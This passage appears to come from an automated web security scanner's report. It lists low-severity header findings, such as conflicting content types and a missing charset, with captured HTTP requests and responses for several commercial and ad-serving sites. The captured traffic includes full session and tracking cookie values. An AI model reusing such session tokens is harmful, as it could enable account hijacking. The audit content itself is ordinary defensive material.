Cookie: affiliate=US-EN-smtp; mail_session=ue8DwvgMWj3limxfE4emkc%2Bezm%2B9mVnU%2FVoqCwNRZihPBS2aHbLPcJsh6zMrtsk5VBdWC2Q4%2FkY28R9i6SSa8dGAVUF8%2FPHumHv5F7VKYeMBcuJ3ocAQC8%2F1zpjTEa2eAIF2%2Fd1MaVsJjlYd%2BEvlsPy4Bruem8u21CL9yz8Ap%2Bo%2BCyjRIR52HCoEp7Gk2hMyvFZOK%2Fjx%2BGyh7%2Fsu8NFSZJ6LqVEMBAyL0NbwqKufi7iGB%2Fv%2F9tP9%2BJn57nRT7jf0OSu%2BSPaMMJ8CfmvGgjKuJr3Z3pjiI0Og8n2P%2BMDPxM5rZyhpW1H5bV6WiztfbkT5g%2BTxq5Sr9hjD093jyLRosfaux9DQuY9RcGBtBWydBnI%2FakIBZf1Gn%2FuhZ530ibuwBdDE3AAckB%2BX%2BQrsXYlox4bwiU%2BKUBCyOImviEfwVersfFPKJQTWs9BG6BLGawt5EAPShjQ3ZpGsRqD6D4DgBt8uEV0jSSUO5Nj9HsCmW6vnbM9Bc%2BhVI8FqYz2j4YkPtqWtgVhuS41Vo00JKJGreh2otpfEl3yl5R6F7KRY3%2BGclQqwvpHsWkNErB2NRzbFk4I3S%2FINHLVFnH2fvlkerYTMa%2B6iqgaqFGiaNLmKiqxdhh5hbqRCvPphR8CMT7hL; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmb=176514170.3.10.1316228159; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server

plan_id=38

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:55:01 GMT
Server: MJWS/1.0
Set-Cookie: mail_session=iQluRDaaB5M5AYtNJtKxLETKPFlyZG2Bb7aOz31g0XcJh051qecDn7WucsCQ5sPWMgov3crx%2Fe%2FVKHsfCKjgl0ts693dBbaw%2Bn8Z%2FZBRorc9S8yidBGGXRaEhLryAJRKXu8%2BmD5MfSSdUTArbPeuXqQTjl2%2Bz9Sps1DERl3gEQpRfzJHQU4%2FwSwXV%2FxG%2F%2B%2FxrLfIRvU4YGR9sNKRhV7Tp8y6xVR%2F406%2FF0NJNO84XVNcH7wVgIoZ%2BDtc6ZqtqYfZNbZ%2Ffsn12Ti6F3wqJfDXrfqEvwXlxxkIL3LWxFPMBsj6GRMSN5Beq9y%2BPikxBZWSpq8SNFZCwRQuOf2iioO708BZnv4AmSVUO2TA2qNfgYDSH75LdyKerW%2BnqWtmWbNib2Ke0irqnRb2LZXI7vbN%2FqlLnObWTqNDuveaarqUwcND3a%2FSRhy9MB5hAXw5SRtmg69SfaKU5IXFco%2F3%2B7CnWJ%2F%2F7VWiEY9c4oqHIUD7f6HMgacyF5JKG%2BefqhRdjC8skgLWP1T%2F07KLzZIrP0dZRJgsTMBLpI%2FYkzvF6CxdxpufVXy5MYalpKk2AIm85yqTw1398l%2Fx3tDNeDOW8EJ4D6%2Fj86oVOWSL2aNXti%2FfnM7wXf2BD9wgdi6H8bNR5Xbf; expires=Fri, 23-Sep-2011 21:55:01 GMT; path=/; domain=.mailjet.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Sign up for a free - mailjet.
...[SNIP]...

24.9. https://www.open.com.au/cgi-bin/sf.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.open.com.au
Path:   /cgi-bin/sf.cgi

Request

POST /cgi-bin/sf.cgi HTTP/1.1
Host: www.open.com.au
Connection: keep-alive
Referer: https://www.open.com.au/onlineorder.php
Content-Length: 626
Cache-Control: max-age=0
Origin: https://www.open.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

formname=Online+order&config=onlineorder.cfg&currency=%2Fonlineorder.php%3Fcurrency%3DAUD&companyname=&address1=&address2=&city=&state=&postcode=&country=&contactname=&contactemail=&contactphone=&sele
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:29 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 657

<html><head><title>Form Error</title></head>
<body><h1>Form Error</h1>
<strong>Your form was not successfully processed
because an error was encountered:</strong>
<p>Mandatory field 'accept' not pres
...[SNIP]...

24.10. https://www.open.com.au/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.open.com.au
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.open.com.au
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:27 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 25 Jan 2005 06:24:18 GMT
ETag: "2382ce-57e-5dd82880"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

24.11. https://www.open.com.au/onlineorder.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.open.com.au
Path:   /onlineorder.php

Request

GET /onlineorder.php HTTP/1.1
Host: www.open.com.au
Connection: keep-alive
Referer: http://www.open.com.au/howtobuy.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41194

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OSC Secure Online Order Form</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

...[SNIP]...

24.12. https://www.open.com.au/style/osc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.open.com.au
Path:   /style/osc

Request

GET /style/osc HTTP/1.1
Host: www.open.com.au
Connection: keep-alive
Referer: https://www.open.com.au/onlineorder.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:24 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 12 May 2011 00:33:35 GMT
ETag: "3007c9-1ad-56e935c0"
Accept-Ranges: bytes
Content-Length: 429
Connection: close
Content-Type: application/x-troff

.oscbody {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   font-size: 11px;
   font-style: normal;
   font-weight: normal;
   font-variant: normal;
   text-transform: none;
   color: #666666;
   bac
...[SNIP]...

24.13. https://www.thundernews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.thundernews.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.thundernews.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ivkp48lpbk512tliksia20ffj1; ck_tn_user_country=-; __utma=64644586.2073731114.1316219532.1316219532.1316219532.1; __utmb=64644586; __utmc=64644586; __utmz=64644586.1316219532.1.1.utmgclid=CIyWi8vAoqsCFQhrgwodLzuGZg|utmccn=(not+set)|utmcmd=(not+set)|utmctr=nntp+server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:37:05 GMT
Server: Apache
Last-Modified: Sat, 31 Oct 2009 10:36:03 GMT
ETag: "9e83b4-47e-b60caac0"
Accept-Ranges: bytes
Content-Length: 1150
Keep-Alive: timeout=2, max=500
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................#......m.yLE.TN.f3).......c..}/..p...w    ................g......C...\.....qA8..{v.n>5.d0&.......Q..\...V..h.................(...T...
...[SNIP]...

25. Multiple content types specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedvoip.com
Path:   /pc_to_phone/images/line_s.gif

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /pc_to_phone/images/line_s.gif HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 853
Content-Type: image/gif
Last-Modified: Wed, 22 Jun 2011 23:04:21 GMT
Accept-Ranges: bytes
ETag: "ee84c2b83031cc1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Web Master </TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://advancedvoip.com/">
...[SNIP]...

26. HTML does not specify charset  previous  next
There are 82 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


26.1. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.126265.CASALEMEDIA/B5564795.9

Request

GET /adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5781
Date: Sat, 17 Sep 2011 01:08:05 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

26.2. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.yahoo.com/B5098223.106

Request

GET /adi/N6092.yahoo.com/B5098223.106;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15r7bi98f/M=791180.14780275.14568948.10366300/D=o_m_g/S=2115806991:LREC/Y=YAHOO/EXP=1316227937/L=bwVTDGKIOPrpARpjTl.wjQPOMhd7ak5z70EABZ7M/B=ujEzMGKJiTc-/J=1316220737421784/K=u7lEbHJbJbau0b_1blFD.w/A=6464717/R=0/*;ord=0.26470078458078206? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6302
Date: Sat, 17 Sep 2011 00:52:57 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Aug 16 16:54:02 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

26.3. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N884.abc.com/B5709785.10

Request

GET /adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1667
Date: Sat, 17 Sep 2011 01:06:03 GMT
Expires: Sat, 17 Sep 2011 01:11:03 GMT

<script type="text/javascript">
var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/f/8b/%2a/i%3B243805900%3B1-0%3B0%3B67516235%3B3454-728/90%3B42127629/42145416/1%3B
...[SNIP]...

26.4. http://ad.doubleclick.net/pfadx/tmz_cim/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/tmz_cim/

Request

GET /pfadx/tmz_cim/;secure=false;canopy_allowed=false;position=1;pc2=1;ic10=1;pc4=1;ic18=1;ac17=1;ac16=1;ac14=1;ama_allowed=false;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;ac20=1;ac10=1;ic3=1;ic12=1;ac19=1;borderless_allowed=false;ic19=1;ic16=1;ac12=1;pc1=1;ic9=1;ic1=1;sz=24x24;dcmt=text/html;ord=1316238803603? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=tmz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 508
DCLK_imp: v7;x;214948934;0-0;0;48682791;24/24;31459665/31477541/1;;~aopt=2/0/5c/0;~okv=;secure=false;canopy_allowed=false;position=1;pc2=1;ic10=1;pc4=1;ic18=1;ac17=1;ac16=1;ac14=1;ama_allowed=false;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;ac20=1;ac10=1;ic3=1;ic12=1;ac19=1;borderless_allowed=false;ic19=1;ic16=1;ac12=1;pc1=1;ic9=1;ic1=1;sz=24x24;dcmt=text/html;~cs=a
Date: Sat, 17 Sep 2011 00:52:00 GMT

DoubleClick.onAdLoaded('MediaAlert', {"impressionUrl": "http://ad.doubleclick.net/imp;v7;x;214948934;0-0;0;48682791;24/24;31459665/31477541/1;;~aopt=2/0/5c/0;~okv=;secure=false;canopy_allowed=false;po
...[SNIP]...

26.5. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?wT8nBZMQIwBWUEQAAAAAAEAgEgAAAAAAAgAAAAYAAAAAAP8AAAAGFEz4GAAAAAAAUvgYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1DhMAAAAAAAIAAgAAAAAAmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMCYyQztO8ClmeR2rwo8Ab3j-oNvoGtMiyJOdrAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F221%2Ftmz%2F728x90%2Fhomepage_btf%3Ft%3D1316238825238,Z%3D728x90%26_salt%3D2029454794%26anmember%3D514%26anprice%3D%26fo%3D%26hp%3D0%26ht%3Djs%26hu%3D%26m%3D0%26r%3D0%26refer%3D%26s%3D2298003%26tz%3D300%26url%3Dhttp%253A%252F%252Fwww.tmz.com%252F,5257a1a2-e0c7-11e0-91e5-78e7d15f7c8c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/221/tmz/728x90/homepage_btf?t=1316238825238&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#v!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!$=57ob!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4u!!!!#=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; ih="b!!!!?!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e$^!!!!$=57om!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; vuday1=8ac=$N5HGHSkRXz; pv1="b!!!!-!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!$%00!!#RS!$XpC!1R*F!%`E+!!!!$!?5%!)H`@:!wVd.!%FMM!'lGU!'m1A~~~~~=4jht=6h5P~!$7w.!!%f!!%d(@!3e$^!'/%f!!H<'~)I#R?!ZmB)!(XE3!(Gex~~~~~~=57om=9KYw!!.vL"; liday1=x6!2!N5HGH'pE)d; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:35 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0396.rm.sp2
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 00:53:35 GMT
Pragma: no-cache
Content-Length: 105
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body><!-- Delivery record decoding failed with reason = 4 (Query string expired) --></body></html>

26.6. http://advancedvoip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advancedvoip.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
